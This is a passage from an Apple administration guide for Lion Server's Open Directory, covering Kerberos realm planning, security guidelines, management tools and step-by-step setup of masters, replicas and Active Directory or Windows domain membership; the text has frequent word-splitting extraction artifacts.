integrate Mac computers with your directory server, you might want to add a record type or object class to the directory schema to better manage and support Mac client computers. For example, by default there may not be a Picture record type in your directory s chema for Mac us ers, but you can add it to your directory schema so Picture records can be s tored in the directory database. To add records or attributes to your directory schema, consult your directory domain adminis trator for instructions. Integrating with schema changes If you are adding Mac computers to a directory domain, you can make schema changes to the directory domain server to better support Mac client computers. When you add a record type or attribute to the directory s chema, investigate whether you have a record type or attribute that can map to it in the existing schema. If you dont have a s imilar record type or attribute that you can map to, add the record type or attribute to your schema. This is referred to as extending your schema. When you extend your s chema you might need to change the default access control lis t (ACL) of s pecific attributes s o computer accounts can read the us er properties . For example, you can configure a Mac to access basic user account information in an Active Directory domain of a Windows 2000 or Windows 2003 or later server. Avoiding Kerberos conflicts with multiple directories If you set up an Open Directory master on a network that has an Active Directory domain, your network will have two Kerberos realms: An Open Directory Kerberos realm and an Active Directory Kerberos realm. For practical purpos es, other s ervers on the network can us e only one Kerberos realm. When you s et up a file server, mail server, or other server that can use Kerberos authentication, you must choose one Kerberos realm. A Mac server must belong to the same Kerberos realm as its client users. The realm has only one authoritative Kerberos server,
which is responsible for all Kerberos authentication in the realm. The Kerberos server can only authenticate clients and servers in its realm. The Kerberos s erver cant authenticate clients or services that are part of a different realm. Only us er accounts in the chos en Kerberos realm will have single sign-on abilities. Us er accounts in the other realm can still authenticate, but they wont have s ingle sign-on. If youre configuring a server to access multiple directory s ystems and each have a Kerberos realm, plan carefully for the user accounts that will use Kerberized services. You mus t know the intent of having access to two directory services. You must join the server to the realm whose companion directory domain contains the user accounts that must use Kerberos and s ingle sign-on. For example, you might want to configure access to an Active Directory realm for its user records and an Open Directory LDAP directory for the Mac OS X Lion records and attributes that arent in Active Directory, such as group and computer records. Other s ervers could join the Active Directory Kerberos realm or the Open Directory Kerberos realm. In this case, the other servers should join the Active Directory Kerberos realm s o Active Directory us er accounts have single sign-on. If you also have user accounts in the Open Directory servers LDAP directory, us ers can still authenticate to them, but the Open Directory user accounts wont us e Kerberos or have single sign-on. Theyll us e Open Directory Password Server authentication methods . You could put all Mac users in the Open Directory domain and all Windows us ers in the Active Directory domain, and they could all authenticate, but only one population could use Kerberos. Do not configure an Open Directory master or replica to also acces s an Active Directory domain (or any other directory domain with a Kerberos realm). If you do, the Open Directory Kerberos realm and the Active Directory Kerberos realm will try to use the same configuration files on the Open Directory server, which disrupts Open Directory Kerberos authentication. To avoid a Kerberos configuration file conflict, dont use an Open Directory s erver as a works tation for managing users in another Kerberos s ervers directory domain, such as an Active Directory domain. Ins tead, use an administrator computer (a Mac computer with s erver administration tools installed) thats configured to access the related directory domains. If you must use an Open Directory server to manage users in another servers directory domain, make sure the other directory domain is not part of the Open Directory s ervers authentication s earch policy. To further avoid a Kerberos configuration file conflict, dont use an Open Directory server to provide services that access a different Kerberos s ervers directory domain. For example, if you configure AFP file service to access Open Directory and Active Directory, dont us e an Open Directory server to provide the file s ervice. Use another server and join it to the Kerberos realm of one directory service or the other. Theoretically, servers or clients can belong to two Kerberos realms , such as an Open Directory realm and an Active Directory realm. Multiple-realm Kerberos authentication requires very advanced configuration, which includes setting up Kerberos servers and clients for cross-realm authentication, and revising Kerberized s ervice software so it can belong to multiple realms. To configure your network to use one Kerberos realm providing s ingle sign-on for two directory domains, s uch as Active Directory and Open Directory, dis able Kerberos on your Open Directory master and connect it to the Active Directory domain. This provides a Kerberos realm for both directory domains and Kerberized services . Also, users on either domain can us e single sign-on authentication. For more information about dis abling Kerberos on an Open Directory mas ter, see Disable Kerberos after setting up an Open Directory master.
Improve directory service performance

You can improve the performance of Open Directory services by adding memory to the server and having it provide fewer services. This strategy als o applies to every other s ervice of a Mac s erver. The more you can dedicate an individual s erver to a s pecific task, the better its performance is. Beyond that general s trategy, you can also improve Open Directory server performance by ass igning the LDAP database to its own disk and the Open Directory logs to another dis k. If your network includes replicas of an Open Directory master, you can improve network performance by s cheduling less-frequent updates of replicas. Updating less frequently means the replicas have les s up-to-date directory data, so you must s trike a balance between higher network performance and less accuracy in your replicas . For greater redundancy of Open Directory services, s et up extra servers as Open Directory replicas or use servers with RAID sets.
Open Directory security

With Lion Server, a server with a shared LDAP directory domain als o provides Open Directory authentication. It is important to protect the authentication data stored by Open Directory. This authentication data includes the Open Directory Pas sword Server database and the Kerberos database, which must also be protected. Therefore, make sure an Open Directory master and all Open Directory replicas are secure by following these guidelines: Keep your server behind a locked door, and always log it out. Physical security of a server that is an Open Directory master or replica is paramount. Secure the media you use to back up an Open Directory Password Server database and a Kerberos database. Having your Open Directory servers behind locked doors wont protect a backup tape that you leave on your desk. Do not use a s erver that is an Open Directory master or replica to provide other services. If you cant dedicate s ervers to be Open Directory mas ters and replicas, minimize the number of services they provide. One of the other services could have a security breach that gives someone acces s to the Kerberos or Open Directory Pass word Server databases . Dedicating servers to provide Open Directory services is an optimal practice but is not required. Set up service access control lis ts (SACLs) for the login window and secure s hell (SSH) to limit who can log in to an Open Directory master or replica. Avoid using a RAID volume thats shared with other computers as the startup volume of a server that is an Open Directory master or replica. A security breach on one of the other computers could jeopardize the security of the Open Directory authentication information. Set up the firewall service to block all ports except those listed here for directory, authentication, and adminis tration protocols: Open Directory Password Server us es ports 106 and 3659. The Kerberos KDC uses TCP/UDP port 88, and TCP/UDP port 749 is us ed for Kerberos administration. The shared LDAP directory uses TCP port 389 for an ordinary connection and TCP port 636 for an SSL connection. Workgroup Manager us es TCP port 311 and 625. Server Admin uses TCP port 311. SMB uses TCP/UDP ports 137, 138, 139, and 445. In s ummary, the most s ecure and bes t practice is to: Equip the Open Directory master computer with an uninterruptible power supply. Dedicate each s erver that is an Open Directory master or replica to provide only Open Directory services. Set up a firewall on these s ervers to provide only the following: directory acces s, authentication, and adminis tration protocols (LDAP, Pass word Server, Kerberos, and Workgroup Manager). Physically secure each Open Directory server and all backup media used with it. Replicating directory and authentication data over the network is a minimal security risk. Pas sword data is securely replicated using random keys negotiated during each replication s ess ion. The authentication portion of replication trafficthe Open Directory Pas sword Server and the Kerberos KDCis fully encrypted. For extra security, configure network connections between Open Directory servers to use network switches rather than hubs. This isolates authentication replication traffic to trusted network segments. Service access control lists (SACLs) Mac OS X Lion uses SACLs to authorize user access to a service. SACLs are made up of acces s control entries (ACEs) that determine the access privileges a user has to a service. You can us e SACLs to allow or deny user access to an Open Directory master or replica by setting SACLs for the login window and SSH. This restricts acces s to the s ervice. You can also use SACLs to s et adminis trator access to Open Directory. This does not restrict access to the service; ins tead, it specifies who can adminis ter or monitor the service. For more information about setting administrator SACLs, s ee Configure Open Directory service access control.
SACLs provide greater control when s pecifying the administrators that have access to monitor and manage the service. Only users and groups lis ted in an SACL have access to its corresponding s ervice. For example, to give adminis trator access to users or groups for the Open Directory service on your s erver, add them to the Open Directory SACL as an ACE.
Manage Open Directory services

The Server Admin, Directory Utility, and Workgroup Manager applications provide a graphical interface for managing Open Directory services in Lion Server. In addition, you can manage Open Directory services from the command line by us ing Terminal. These applications are included with Lion Server and can be installed on another computer with Mac OS X Lion, making that computer an administrator computer. You can also install Server Admin on a computer with Mac OS X Lion and us e it to manage Open Directory on any server on your local network and elsewhere. You can als o manage Open Directory remotely by using command-line tools from a Mac computer or a non-Macintosh computer. Server Admin Server Admin provides acces s to tools you use to set up, manage, and monitor Open Directory services and other s ervices. You use Server Admin to: Set up a Mac s erver as an Open Directory master, an Open Directory replica, a server thats connected to a directory s ystem, or a standalone directory service with only a local directory domain. For more information, s ee Set up Open Directory s ervices. Set up more Mac server s ystems to use the Kerberos KDC of an Open Directory mas ter or replica. For more information, see Set up Open Directory s ervices . Configure LDAP options on an Open Directory master. For more information, see Set up Open Directory services. Configure DHCP service to s upply an LDAP server address to Mac computers with automatic search policies. Set up pas sword policies that apply to all users who dont have overriding individual password policies . For more information, see Set password policies for users. Monitor Open Directory services. For more information, see Maintaining Open Directory Services. Server Admin is in /Applications/Server/. Directory Utility Directory Utility determines how a Mac computer uses directory services, discovers network services, and searches directory services for authentication and contacts information. You us e Directory Utility to: Configure advanced connections to LDAP directories, an Active Directory domain, and a Network Information Services (NIS) domain Configure data mapping for LDAP directories Define policies for s earching multiple directory services for authentication and contact information Enable or disable types of directory services and types of network service discovery View directory entries in raw form by using Directory Editor. For more information, see View or edit directory data. Directory Utility can connect to other servers on your network so you can configure them remotely. For more information about using Directory Utility, see Directory Utility Help. Directory Utility is installed on every Mac and can be acces sed through Users & Groups preferences. Server app The Server app provides management of Mac server users. Use the Server app to: Set up and manage user accounts and group accounts. For more information, see Server app help. Manage share points for file services. For more information, see the sections on file sharing in the Server app help. Workgroup Manager Workgroup Manager provides comprehensive management of Mac OS X Server clients . You use Workgroup Manager to:
Set up and manage user accounts, group accounts, and computer groups. Manage share points for file services and user home folders. Control what Mac OS X users see when they select the Network globe in a Finder s idebar. View directory entries in raw form by using the Inspector. For information about using Workgroup Manager, see Workgroup Manager Help. Workgroup Manager is installed in /Applications/Server/. Command-line tools A full range of command-line tools is available for administrators who prefer to us e command-driven server administration. For remote s erver management, s ubmit commands in an SSH sess ion. You can enter commands on Mac servers and computers using Terminal, located in /Applications /Utilities/.
Set up Open Directory
Set up Open Directory services

Open Directory services directory s ervices and authentication servicesare an ess ential part of a networks infras tructure. These services have a significant effect on other network services and on users. Therefore you must set up Open Directory correctly from the beginning. Here is a summary of the major tasks you perform to set up Open Directory services. For detailed information about each step, see the pages indicated. Before you begin, do some planning Before setting up Open Directory s ervices for the first time: Unders tand the uses of directory data and as sess your directory needs. Identify the s ervices that require data from directory domains and determine which users need acces s to those services. Users whose information can be managed most easily on a server should be defined in the s hared LDAP directory of a Mac server that is an Open Directory master. Some of these users can be defined in directory domains on other servers, s uch as an Active Directory domain on a Windows server. These concepts are dis cuss ed in Open Directory and directory services. Ass ess whether you need more than one s hared domain. If s o, decide which users will be defined in each s hared domain. For more information, see Open Directory s earch policies. Determine which authentication options users need. For available options , see Monitor Open Directory authentication. Decide whether to have replicas of your Open Directory mas ter. For guidelines , see Open Directory planning. Select server adminis trators carefully. Provide administrator passwords only to people you trust. Have as few administrators as pos sible. Dont delegate administrator acces s for minor tas ks, such as changing s ettings in a us er record. Directory information vitally affects everyone whose computers us e it. Turn on Open Directory service. Use Server Admin to turn the Open Directory service on. After the service is on, you can configure Open Directory s ervice settings. For more information about turning on Open Directory service, see Turn on Open Directory service. Set up a standalone directory service To set up s ervers that wont get authentication and other adminis trative information from another directory service, s ee Set up a standalone directory service. Set up an Open Directory master To set up a s erver to provide directory and authentication services, see Replicate Open Directory services and Set up an Open Directory master. Set up an Open Directory replica To set up s ervers to provide failover directory and authentication services or remote directory and authentication services for fast client interaction on distributed networks, see Set up an Open Directory replica or relay.
Set up Open Directory relays for cascading replication To set up a s erver to be a replica or relay of an Open Directory mas ter so it can provide directory information and authentication information to computers, see Replicate Open Directory services. Set up servers that connect to other directory systems If you have file servers or other servers that access directory and authentication services, s ee Configure access to an Open Directory server. Set up single sign-on Kerberos authentication If you have an Open Directory mas ter, you can configure other s ervers to join its Kerberos realm. If you set up an Open Directory master without Kerberos, you can set up Kerberos later. For more information, see Set up single sign-on Kerberos authentication. Set up client computers to connect to directory services If you have an Open Directory mas ter, you must configure client computers to acces s its directory domain. You can also configure computers to acces s other directory services such as Microsoft Active Directory. See Configure acces s to an Open Directory server and Configure access to an Active Directory domain.
Turn on Open Directory service

Before you can configure Open Directory settings , you must turn on Open Directory service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Services. 4. Select the Open Directory checkbox. 5. Click Save.
Set up a standalone directory service

Using Server Admin, you can s et up a Mac server to use only the servers local directory domain. The server does not provide directory information to other computers or get directory information from an existing system. (The local directory domain cant be shared.) If you change a Mac server to get directory information only from its local directory domain, user records and other information that the server retrieved from a shared directory domain become unavailable. The user records and other information in the shared directory domain are deleted. Files and folders on the s erver can become unavailable to us ers whos e accounts are in the shared directory domain. If the server was an Open Directory mas ter and other servers were connected to it, the following can occur: Services can be disrupted on the connected servers when us er accounts and other information in the s hared directory domain become unavailable. Users whose accounts are in the shared directory domain might not be able to access files and folders on the Open Directory master and on other servers that were connected to its shared LDAP directory domain. You can archive a copy of the Open Directory masters directory and authentication data before changing it to an Open Directory standalone directory service. For more information, see Archive an Open Directory mas ter. You can also export users, groups , and computer groups from the Open Directory mas ter before changing it to a standalone directory service.
The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. 5. Click Change. The Open Directory As sistant opens. 6. Choose from the following: If your s erver is an Open Directory master, s elect "Destroy Master and set up s tandalone directory," then click Continue. If your s erver is an Open Directory replica, select "Decommiss ion replica and set up standalone directory," click Continue, enter the root password for the Open Directory master, enter the domain administrator's login credentials , and then click Continue. 7. Confirm the configuration setting, then click Continue. 8. If you are sure that users and s ervices no longer need access to the directory data stored in the shared directory domain that the server has been hosting or is connected to, click Done.
Set up an Open Directory master

Using Server Admin, you can s et up a Mac server to be an Open Directory master so it can provide directory information and authentication information to other s ys tems . Lion Server provides directory information by hos ting a s hared LDAP directory domain. In addition, the server authenticates users whos e accounts are stored in the shared LDAP directory domain. An Open Directory master has an Open Directory password s erver, which supports all conventional authentication methods required by Lion Server services. In addition, an Open Directory master can provide Kerberos authentication for single s ign-on. If you want the Open Directory master to provide Kerberos authentication for single sign-on, DNS must be available on the network and mus t be correctly configured to resolve the fully qualified DNS name of the Open Directory master server to its IP address. DNS must also be configured to res olve the IP addres s to the s ervers fully qualified DNS name. Important: If youre changing an Open Directory replica to an Open Directory master, the procedure you follow depends on whether the replica replaces the master or becomes an extra master: To promote a replica to replace a nonfunctional mas ter, follow the instructions in Promote an Open Directory replica instead of the instructions here. To change a replica to an extra master, decommission the replica as described in Decommis sion an Open Directory replica, then make it a master by following the s teps in this topic. Note: If a Mac server was connected to a directory system and you make the s erver an Open Directory master, it remains connected to the other directory system. The server searches for user records and other information in its shared LDAP directory domain before s earching in other directory systems it is connected to. Important: If your Lion Server is an Open Directory master, it has a diradmin user. When binding two directory servers , they should not have the same directory adminis trator user name (diradmin). If two Lion Servers are configured as Open Directory masters and are bound to each other, they become an invalid configuration and can caus e random failures. Make one of the Open Directory mas ter servers a s tandalone server, then recreate it us ing Server Admin with a unique us ername for the directory administrator instead of the default diradmin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. If the Role option is set to Open Directory Replica and you want to make a new Open Directory master, change the server role to Standalone. For more information, s ee Setting Up a Standalone Directory Service.
If you want to change an Open Directory replica to a mas ter, promote the replica to be a master instead of making a new master. For more information, see Promote an Open Directory replica. 5. Click Change. This opens the Open Directory Ass is tant. 6. Select "Set up an Open Directory Master," then click Continue. If your DNS Server is not configured, a message about s ingle sign-on being unavailable appears. To use s ingle sign-on, clos e the assistant and configure your DNS. If you dont want to use s ingle s ign-on, click Continue to configure your Open Directory master without s ingle s ign-on. 7. Enter the following Master Directory Adminis trator information, then click Continue: Name, Short Name, User ID, Pass word: You must create a user account for the primary administrator of the LDAP directory. This account is not a copy of the administrator account in the servers local directory domain. Make the names and us er ID of the LDAP directory administrator different from the names and user IDs of us er accounts in the local directory domain. Also, to prevent the directory adminis trator account from being listed in the login window, ass ign the directory administrator account a user ID below 100. Accounts with user IDs below 100 are not lis ted in the login window. Note: To connect your Open Directory Mas ter to other directory domains, specify a unique name and user ID for each domain. Dont use the s uggested diradmin user ID. Use a name that helps you distinguish the directory domain that the directory administrator controls . 8. Enter the following Master Domain information, then click Continue: Kerberos Realm: This field is s et to the servers DNS name, converted to capital letters . This is the convention for naming a Kerberos realm. You can enter a different name if necessary. Search Base: This field is s et to a search base suffix for the new LDAP directory, derived from the domain portion of the servers DNS name. You can enter a different search base suffix or leave it blank. If you leave this field blank, the LDAP directorys default search bas e suffix is us ed. 9. Confirm s ettings , then click Continue. 10. Confirm that the Open Directory mas ter is functioning by clicking Overview (near the top of the Server Admin window, with Open Directory s elected in the Servers list). The status of items lis ted in the Open Directory overview pane s hould say Running. If Kerberos remains stopped and you want it running, s ee If Kerberos is stopped on an Open Directory mas ter or replica. After s etting up a Mac server to be an Open Directory master, you can change its binding policy, security policy, pas sword policy, replication frequency, and LDAP protocol options. For more information, see Set a binding policy for an Open Directory server, Set the search timeout interval for LDAP service, and Set a s ecurity policy for an Open Directory s erver. You can configure other computers with Mac OS X Lion or Mac OS X Lion Server to access the servers shared LDAP directory domain. For more information, see Configure access to an LDAP directory.
Set up Windows 2000 for domain login

You can enable domain login on a Windows 2000 computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and password of an LDAP directory administrator account. You can delegate this tas k to s omeone with a local adminis trator account on the Windows computer. In this cas e, you may want to create a temporary LDAP directory administrator account with limited privileges.
1. Log in to Windows 2000 using a local administrator account. 2. Open the Control Panel, then open System. 3. Click Network Identification, then click Properties. 4. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the s erver, open Server Admin on the server or an administrator computer, select Open
Directory in the Servers lis t, click Settings, then click General. 5. Enter the name and pas sword of an LDAP directory adminis trator and click OK.
Set up Windows XP for domain login

You can enable domain login on a Windows XP computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and password of an LDAP directory administrator account. You can delegate this tas k to s omeone with a local adminis trator account on the Windows computer. In this cas e, you may want to create a temporary LDAP directory administrator account with limited privileges.
1. Log in to Windows XP using a local adminis trator account. 2. Open the Control Panel, then open System. 3. Click Computer Name, then click Change. 4. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the s erver, open Server Admin on the server or an administrator computer, select Open Directory in the Servers lis t, click Settings, then click General. 5. Enter the name and pas sword of an LDAP directory adminis trator and click OK.
Set up Windows Vista or Windows 7 for domain login

You can enable domain login on a Windows Vista or Windows 7 computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and pass word of an LDAP directory administrator account. You can delegate this tas k to s omeone with a local adminis trator account on the Windows computer. In this cas e, you might want to create a temporary LDAP directory adminis trator account with limited privileges . Note: Only Windows Vista Ultimate, Windows Vis ta Busines s edition, Windows 7 Ultimate, and Windows 7 Profes sional can connect to a domain.
1. Log in to Windows Vis ta using a local administrator account. 2. Open the Control Panel, then open System and Maintenance (Windows Vista) or System and Security (Windows 7). 3. Click System, then click Change Settings. 4. Click Computer Name, then click Change. 5. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the s erver, open Server Admin on the server or an administrator computer, select Open Directory in the Servers lis t, click Settings, then click General. 6. Enter the name and pas sword of an LDAP directory adminis trator and click OK.
Set up an Open Directory replica or relay

Using Server Admin, you can s et up a Mac server to be a replica or relay of an Open Directory mas ter so it can provide the same directory information and authentication information to other s ystems as the master. The replica or relay server hosts a read-only copy of the masters LDAP directory domain. The replica or relay server als o hosts a read/write copy of the Open Directory Password Server and the Kerberos Key Distribution Center (KDC). A replica is cons idered to be a relay if it is a direct member of the Open Directory master and it has replicas.
Open Directory replicas or relays provide these benefits: In a wide area network (WAN) of local area networks (LANs) interconnected by slow links, replicas on the LANs provide servers and client computers with fast access to us er accounts and other directory information. A replica provides redundancy. If the Open Directory master fails, computers connected to it switch to a nearby replica. This automatic failover behavior is a feature of Mac OS X and Mac OS X Server v10.4 and 10.5 or later. Note: If your network has a mix of Mac OS X Server versions 10.6 and Lion Server, one vers ion cant be a replica of a master of the other version. An Open Directory master of Lion Server wont replicate to Mac OS X Server v10.6, nor will an Open Directory master of Mac OS X Server v10.6 replicate to Lion Server. When you set up an Open Directory replica, all directory and authentication data must be copied to it from the Open Directory master. Replication can take several seconds or several minutes , depending on the size of the directory domain. Replication over a slow network link can take a long time. During replication, the mas ter cannot provide directory or authentication services. You cant us e user accounts in the master LDAP directory to log in or authenticate for services until replication is finished. To minimize the disruption of directory s ervice, set up a replica before the master LDAP directory is fully populated or at a time of day when the directory service is not needed. Having another replica set up will insulate clients of directory service from problems if the master becomes unavailable. To make more than one server a replica of an Open Directory master, create the replicas one at a time. If you try to create two replicas simultaneously, one attempt succeeds and the other fails. A s ubs equent attempt to establish the second replica should succeed. You can have up to 32 replicas of an Open Directory master. These direct members of the Open Directory mas ter server are known as relays . Each relay can have up to 32 replicas of itself, giving you 1056 replicas in a two-tier hierarchy. If you change a Mac server that was connected to another directory sys tem to be an Open Directory replica, the s erver remains connected to the other directory system. The server searches for user records and other information in its shared LDAP directory domain before s earching in other directory systems it is connected to.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. Click Settings, then click General. 4. Click Change. The Open Directory As sistant opens. 5. Choose Set up an Open Directory Replica, then click Continue. 6. Enter the following requested information: IP addres s or DNS name of Open Directory master: Enter the IP address or DNS name of the server that is the Open Directory master. Root password on Open Directory master: Enter the pas sword of the Open Directory master sys tems root user (user name s ystem administrator). Domain adminis trators s hort name: Enter the name of an LDAP directory domain adminis trator account. Domain adminis trators pass word: Enter the pas sword of the administrator account whose name you entered. 7. Click Continue. 8. Confirm the Open Directory configuration settings , then click Continue. 9. Click Close. 10. Make sure the date, time, and time zone are correct on the replica and the master. The replica and the master should use the same network time service so their clocks remain in sync. After you set up an Open Directory replica, other computers will connect to it as needed.
Computers with v10.3 or v10.4 of Mac OS X or Mac OS X Server maintain a list of Open Directory replicas. If one of these computers cant contact the Open Directory master for directory and authentication s ervices , the computer connects to the neares t replica of the master. You can configure Macs to connect to an Open Directory replica ins tead of the Open Directory master for directory and authentication services. On each Mac computer, you can use Users & Groups preferences to create an LDAPv3 configuration for access ing the replicas LDAP directory. The Open Directory master updates the replica. You can configure the master to update its replicas at a specific interval or whenever the master directory changes.
Open Directory failover

If an Open Directory master or its replicas become unavailable, client computers that use Mac OS X v10.5 or later find an available replica and connect to it. Replicas only permit clients to read directory information. Directory information about a replica cant be modified with administration tools s uch as Workgroup Manager. Users whose pas sword type is Open Directory can change their pas swords on computers that are connected to Open Directory replicas. The replicas s ynchronize pass word changes with the master. If the mas ter is unavailable for a while, the replicas synchronize pas sword changes with the mas ter when it becomes available again. If the Open Directory mas ter fails permanently and you have a current archive of its data, you can restore the data to a new master. Alternatively, you can promote a replica to be the master. For more information, see Restore an Open Directory mas ter and Promote an Open Directory replica. If you replace a failed master by promoting a replica to be the master, you can manually reconfigure each computer and s erver to connect to this new master or one of its replicas. You do this by using Account preferences (or Directory Utility for advanced connections) on each computer or s erver to create an LDAPv3 configuration that specifies how the computer accesses the new master or an available replica.
Set up a connection to a directory server

Using Server Admin, you can s et up a Mac server to get us er records and other directory information from another servers shared directory domain. The other s erver als o provides authentication for its directory information. A Mac server s till gets directory information from its own local directory domain and provides authentication for this local directory information. Important: Changing a Mac server to be connected to another directory s ystem instead of being an Open Directory mas ter turns off its shared LDAP directory domain, with the following ramifications: User records and other information in the s hared directory domain are deleted. If other servers were connected to the master directory domain, their services may be disrupted when user accounts and other information in the deactivated directory domain become unavailable. Users who had accounts in the deactivated directory domain might not be able to access files and folders on the Open Directory master and on other servers that were connected to the master directory domain.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. 5. Click Change.
The Open Directory As sistant opens. 6. Choose Connected to another directory, then click Continue. 7. Confirm the configuration settings, then click Continue. 8. If the server was an Open Directory mas ter and you are sure that us ers and services no longer need acces s to the directory data s tored in the shared directory domain that the server has been hosting, click Done. 9. Click the Open Directory Utility button to configure access to directory sys tems. 10. If the server youre configuring has access to a directory system that also hosts a Kerberos realm, you can join the s erver to the Kerberos realm. To join the Kerberos realm, you need the name and password of a Kerberos adminis trator or a us er who has been delegated the authority to join the realm. For more information, see Join a server to a Kerberos realm.
Set up a server as an Active Directory domain member

Using Server Admin and Users & Groups preferences (or Directory Utility for advanced connections), you can set up a Mac server to join an Active Directory domain hosted by a Windows 2000 or 2003 server. A server that joins an Active Directory domain can provide file, print, and other services to users with accounts in the Active Directory domain. The domain member server gets authentication services from Active Directory. The domain member server does not provide authentication services to other domain member s ervers.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. 5. Click Change. The Open Directory As sitant opens . 6. Choose Connected to another directory, then click Continue. 7. Confirm the Open Directory configuration settings , then click Continue. 8. Click Done. 9. To configure advanced settings for your Active Directory connection, click Open Directory Utility. For more information about advanced connections to an Active Directory server, see Configure access to an Active Directory domain. Begin at s tep 4. 10. Open Sys tem Preferences and click Accounts . 11. In the lower left corner of System Preferences, click the lock and authenticate when prompted. 12. Click Login Options. 13. Click Directory Services. 14. Click the Add button (+). 15. From the Add a new directory of type pop-up menu, choose Active Directory, then enter the following: Active Directory Domain: Specify the DNS name of the Active Directory s erver. Computer ID: Optionally edit the ID you want Active Directory to use for your s erver. This is the servers NetBIOS name. The name s hould contain no more than 15 characters, no special characters , and no punctuation. If practical, make the s erver name match its unqualified DNS host name. For example, if your DNS s erver has an entry for your s erver as s erver.example.com, give your server the name server.
AD Administrator Us ername and Pass word: Enter the user name and password of a user that has authorization to add computers to Active Directory. 16. Click OK and then click Done. 17. Close System Preferences. 18. Open Server Admin and connect to the s erver. 19. Click the triangle at the left of the server. The list of s ervices appears . 20. From the expanded Servers list, select Open Directory. 21. Click Setting, then click General. 22. Click Join Kerberos to join the server to the Active Directory Kerberos realm. 23. Enter the following information: Administrator Name: Enter the Kerberos s erver administrators user name. Pas sword: Enter the Kerberos server administrator password. Realm Name: Enter the realm name of the Kerberos s erver. DNS/Bonjour Name of KDC: Enter the DNS or Bonjour name of the Kerberos server. 24. Click OK. 25. From the Servers list, select SMB. 26. Click Settings, then click General. 27. Verify that the s erver is now a member of the Active Directory domain. You can change the servers optional description, which appears in the Network Places window on Windows computers. After setting up an Active Directory domain member, you might want to change access restrictions , logging detail level, code page, domain brows ing, or WINS regis tration. Then if Windows services arent running, you can start them.
Set up single sign-on Kerberos authentication

Setting up single sign-on Kerberos authentication involves thes e tas ks: Make DNS available on the network and configure it to res olve the fully qualified DNS name of the Open Directory master server (or other Kerberos server) to its IP addres s. Als o, configure DNS to res olve the IP addres s to the servers fully qualified DNS name. Have an administrator set up a directory s ystem to host a Kerberos realm. For more information about setting up a Mac server to host a Kerberos realm, see Setting up an Open Directory Kerberos realm. Have a Kerberos administrator of an Open Directory master delegate the authority to join s ervers to the Open Directory masters Kerberos realm.The administrator does not need delegated authority. A Kerberos administrator has implicit authority to join any server to the Kerberos realm. See Delegate authority to join an Open Directory Kerberos realm. Have a Kerberos administrator or users with delegated authority join s ervers to the Kerberos realm, which then provides single sign-on Kerberos authentication for services provided by the servers that have joined. See Join a server to a Kerberos realm. Set all computers using Kerberos to the correct date, time, and time zone, and configure them to us e the same network time server. Kerberos depends on the clocks of all participating computers being in sync. When you are configuring an Open Directory master, make sure DNS is correctly configured and running before you s tart Open Directory service for the firs t time. If DNS is not configured properly or is not running when you start Open Directory, Kerberos does not function properly. When Open Directory is s tarted for the firs t time, Kerberos uses DNS to generate configuration settings . If your DNS s erver is not available when Kerberos is initially started, its configurations are invalid and it does not work properly.
After Kerberos is running and has generated its configuration file, it no longer completely depends on DNS and changes to DNS do not affect Kerberos . The individual services of Lion Server do not require configuration for s ingle sign-on or Kerberos. The following services are ready for single sign-on Kerberos authentication on every server with Lion Server that has joined or is an Open Directory master or replica: Login window Mail service AFP FTP SMB (as a member of an Active Directory Kerberos realm) iChat s ervice Print service NFS Xgrid service VPN Apache web service LDAPv3 directory service (on an Open Directory mas ter or replica). Setting up an open directory Kerberos realm You can provide single sign-on Kerberos authentication on your network by setting up an Open Directory master. You can set up an Open Directory master during initial configuration that follows ins tallation of Lion Server, but if you s et up a Mac server to have a different Open Directory role, you can change its role to that of Open Directory master by us ing Server Admin. For more information, s ee Set up an Open Directory master and Start Kerberos after setting up an Open Directory master. A server that is an Open Directory master requires no other configuration to support s ingle sign-on Kerberos authentication for Kerberized s ervices that the server provides. The s erver can also s upport single sign-on Kerberos authentication for Kerberized services of other servers on the network. The other servers mus t be s et up to join the Open Directory Kerberos realm. For more information, s ee Delegate authority to join an Open Directory Kerberos realm, and Join a server to a Kerberos realm. Important: An Open Directory mas ter requires DNS to be properly configured so it can provide Kerberos and s ingle sign-on authentication. In addition: DNS service must be configured to resolve the fully qualified DNS names of all servers (including the Open Directory master) to their IP addres ses and to provide the corresponding reverse lookups. For more information about s etting up DNS s ervice, see Network Services Administration. The Open Directory master s ervers Network preferences must be configured to us e the DNS server that res olves the servers name. (If the Open Directory master server provides its own DNS s ervice, its Network preferences mus t be configured to use itself as a DNS server.)
Join a server to a Kerberos realm

Using Server Admin, a Kerberos administrator or a user whose account has the properly delegated authority can join a Mac server to a Kerberos realm. The s erver can join only one Kerberos realm. It can be an Open Directory Kerberos realm, an Active Directory Kerberos realm, or an existing realm bas ed on MIT Kerberos. To join an Open Directory Kerberos realm, you need a Kerberos administrator account or a us er account with delegated Kerberos authority. For more information, see Delegate authority to join an Open Directory Kerberos realm.
